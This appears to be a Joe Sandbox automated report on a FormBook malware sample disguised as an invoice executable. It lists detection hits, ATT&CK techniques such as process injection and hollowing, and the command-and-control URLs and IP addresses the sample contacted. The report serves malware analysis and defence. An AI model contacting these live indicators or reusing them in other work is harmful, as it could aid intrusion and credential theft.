          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.PI L032452021xxls.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.PI L032452021xxls.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.416682205.0000000007630000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.622477273.0000000003370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.475476363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.619318186.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.438420225.0000000007630000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.622417859.0000000003340000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.385908241.0000000003A29000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.PI L032452021xxls.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.PI L032452021xxls.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.476678595.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.476370627.0000000000CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.416682205.0000000007630000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.622477273.0000000003370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.475476363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.619318186.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.438420225.0000000007630000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.622417859.0000000003340000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.385908241.0000000003A29000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information11Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 483590 Sample: PI L032452021xxls.exe Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 9 other signatures 2->46 10 PI L032452021xxls.exe 3 2->10         started        process3 file4 32 C:\Users\user\...\PI L032452021xxls.exe.log, ASCII 10->32 dropped 58 Injects a PE file into a foreign processes 10->58 14 PI L032452021xxls.exe 10->14         started        17 PI L032452021xxls.exe 10->17         started        signatures5 process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 19 explorer.exe 14->19 injected process8 dnsIp9 34 shops.myshopify.com 23.227.38.74, 49819, 80 CLOUDFLARENETUS Canada 19->34 36 www.vdvppt.club 99.83.154.118, 49818, 80 AMAZON-02US United States 19->36 38 www.karnez.net 19->38 48 System process connects to network (likely due to code injection or exploit) 19->48 23 msdt.exe 19->23         started        26 autoconv.exe 19->26         started        signatures10 process11 signatures12 50 Self deletion via cmd delete 23->50 52 Modifies the context of a thread in another process (thread injection) 23->52 54 Maps a DLL or memory area into another process 23->54 56 Tries to detect virtualization through RDTSC time measurements 23->56 28 cmd.exe 1 23->28         started        process13 process14 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PI L032452021xxls.exe21%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.PI L032452021xxls.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          shops.myshopify.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.monotype.W0%Avira URL Cloudsafe
          http://www.sajatypeworks.com.0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/er&=p0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.sajatypeworks.comt-i0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htmB0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn50%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/-r~=0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Webd0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.fontbureau.comIr0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/lr9=e0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/ers0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/roso0%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          www.barry-associates.com/ergs/100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.vdvppt.club/ergs/?rt=jBPLMP3h1LcdC&J8uTkT=JWbjbWIzi5Xd8qR/4tQdqrKkFdlvhz2KwPZGVEcCMD5MfsK3CM+df9zTKLP63o3kNg3XOCoErQ==0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/lr9=e0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Br0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.founder.com.cn/cna0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/-r~=0%Avira URL Cloudsafe
          http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.sakkal.comc0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/aniewr0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp//nn~r/=e0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.fontbureau.comF0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/Ir0%Avira URL Cloudsafe
          http://www.sajatypeworks.coms0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0r0%Avira URL Cloudsafe
          http://www.founder.com.c0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/Ir0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Ian0%URL Reputationsafe
          http://www.fontbureau.comessedIr0%Avira URL Cloudsafe
          http://www.fontbureau.comessed?rl=0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htmjf0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Sue0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.founder.com.cn/cnd.0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.fontbureau.comT.TTFlr9=e0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn-0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/&rg=0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.zhongyicts.com.cno.0%URL Reputationsafe
          http://www.fontbureau.comalic0%URL Reputationsafe
          http://www.karnez.net/ergs/?J8uTkT=c9bkYQKJ+lNI6VVZ5eI1zueoz+82ajOViy0Ll3ZdIgo7PyasuomRPuIVCCVSa7haztcFmZ8CSw==&rt=jBPLMP3h1LcdC0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/b0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0r0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/a-d-r~=0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.vdvppt.club
          99.83.154.118
          truetrue
            unknown
            shops.myshopify.com
            23.227.38.74
            truetrueunknown
            www.karnez.net
            unknown
            unknowntrue
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              www.barry-associates.com/ergs/true
              • Avira URL Cloud: malware
              low
              http://www.vdvppt.club/ergs/?rt=jBPLMP3h1LcdC&J8uTkT=JWbjbWIzi5Xd8qR/4tQdqrKkFdlvhz2KwPZGVEcCMD5MfsK3CM+df9zTKLP63o3kNg3XOCoErQ==true
              • Avira URL Cloud: safe
              unknown
              http://www.karnez.net/ergs/?J8uTkT=c9bkYQKJ+lNI6VVZ5eI1zueoz+82ajOViy0Ll3ZdIgo7PyasuomRPuIVCCVSa7haztcFmZ8CSw==&rt=jBPLMP3h1LcdCtrue
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.monotype.WPI L032452021xxls.exe, 00000000.00000003.365187933.0000000005877000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.sajatypeworks.com.PI L032452021xxls.exe, 00000000.00000003.355005880.00000000058AD000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.fontbureau.com/designersGPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                high
                http://www.jiyu-kobo.co.jp/er&=pPI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.fontbureau.com/designers/?PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                  high
                  http://www.founder.com.cn/cn/bThePI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.sajatypeworks.comt-iPI L032452021xxls.exe, 00000000.00000003.355005880.00000000058AD000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.galapagosdesign.com/staff/dennis.htmBPI L032452021xxls.exe, 00000000.00000003.365423437.0000000005874000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zhongyicts.com.cn5PI L032452021xxls.exe, 00000000.00000003.358246478.0000000005877000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.fontbureau.com/designers?PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                    high
                    http://www.jiyu-kobo.co.jp/-r~=PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.jiyu-kobo.co.jp/WebdPI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.tiro.comPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designersPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                      high
                      http://www.goodfont.co.krPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.comIrPI L032452021xxls.exe, 00000000.00000002.391202739.0000000005870000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/lr9=ePI L032452021xxls.exe, 00000000.00000003.359207902.0000000005874000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/ersPI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.sajatypeworks.comPI L032452021xxls.exe, 00000000.00000003.355005880.00000000058AD000.00000004.00000001.sdmp, PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/rosoPI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.typography.netDPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.founder.com.cn/cn/cThePI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.galapagosdesign.com/staff/dennis.htmPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://fontfabrik.comPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/jp/lr9=ePI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/BrPI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.galapagosdesign.com/DPleasePI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.founder.com.cn/cnaPI L032452021xxls.exe, 00000000.00000003.358089167.000000000587F000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.jiyu-kobo.co.jp/jp/-r~=PI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.ascendercorp.com/typedesigners.htmlPI L032452021xxls.exe, 00000000.00000003.361054370.000000000587D000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fonts.comPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                        high
                        http://www.sandoll.co.krPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.urwpp.deDPleasePI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.sakkal.comcPI L032452021xxls.exe, 00000000.00000003.360580691.0000000005876000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.zhongyicts.com.cnPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.sakkal.comPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.jiyu-kobo.co.jp/aniewrPI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.jiyu-kobo.co.jp//nn~r/=ePI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000007.00000000.429962276.000000000095C000.00000004.00000020.sdmpfalse
                          high
                          http://www.apache.org/licenses/LICENSE-2.0PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                            high
                            http://www.fontbureau.comPI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmp, PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                              high
                              http://www.galapagosdesign.com/PI L032452021xxls.exe, 00000000.00000003.365423437.0000000005874000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.comFPI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/IrPI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.sajatypeworks.comsPI L032452021xxls.exe, 00000000.00000003.355005880.00000000058AD000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/jp/0rPI L032452021xxls.exe, 00000000.00000003.360084029.0000000005875000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.founder.com.cPI L032452021xxls.exe, 00000000.00000003.357574592.0000000005876000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/jp/IrPI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/IanPI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.comessedIrPI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.comessed?rl=PI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/jp/PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmp, PI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.galapagosdesign.com/staff/dennis.htmjfPI L032452021xxls.exe, 00000000.00000003.365423437.0000000005874000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/SuePI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.carterandcone.comlPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNPI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                                high
                                http://www.founder.com.cn/cnd.PI L032452021xxls.exe, 00000000.00000003.357173176.000000000587B000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.founder.com.cn/cnPI L032452021xxls.exe, 00000000.00000003.357173176.000000000587B000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlPI L032452021xxls.exe, 00000000.00000003.362716752.00000000058AE000.00000004.00000001.sdmp, PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.comT.TTFlr9=ePI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.founder.com.cn/cn-PI L032452021xxls.exe, 00000000.00000003.358089167.000000000587F000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/sPI L032452021xxls.exe, 00000000.00000003.359082297.0000000005874000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/&rg=PI L032452021xxls.exe, 00000000.00000003.360266825.0000000005874000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/PI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.zhongyicts.com.cno.PI L032452021xxls.exe, 00000000.00000003.358246478.0000000005877000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers8PI L032452021xxls.exe, 00000000.00000002.391458911.0000000006A82000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.fontbureau.comalicPI L032452021xxls.exe, 00000000.00000003.362750701.0000000005876000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.jiyu-kobo.co.jp/bPI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.jiyu-kobo.co.jp/0rPI L032452021xxls.exe, 00000000.00000003.359682803.0000000005874000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.jiyu-kobo.co.jp/a-d-r~=PI L032452021xxls.exe, 00000000.00000003.358957608.0000000005874000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    23.227.38.74
                                    shops.myshopify.comCanada
                                    13335CLOUDFLARENETUStrue
                                    99.83.154.118
                                    www.vdvppt.clubUnited States
                                    16509AMAZON-02UStrue

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:483590
                                    Start date:15.09.2021
                                    Start time:09:38:44
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 12m 16s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:PI L032452021xxls.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:26
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@10/1@2/2
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 37.4% (good quality ratio 34.3%)
                                    • Quality average: 73.7%
                                    • Quality standard deviation: 30.6%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 92.122.145.220, 20.82.210.154, 23.55.161.165, 23.55.161.168, 23.55.161.167, 23.55.161.169, 23.55.161.132, 23.55.161.163, 23.55.161.162, 23.55.161.170, 23.55.161.133, 20.54.110.249, 40.112.88.60, 23.216.77.208, 23.216.77.209, 23.35.236.56, 20.82.209.183
                                    • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:39:55API Interceptor1x Sleep call for process: PI L032452021xxls.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    23.227.38.74UPDATED e-STATEMENT.exeGet hashmaliciousBrowse
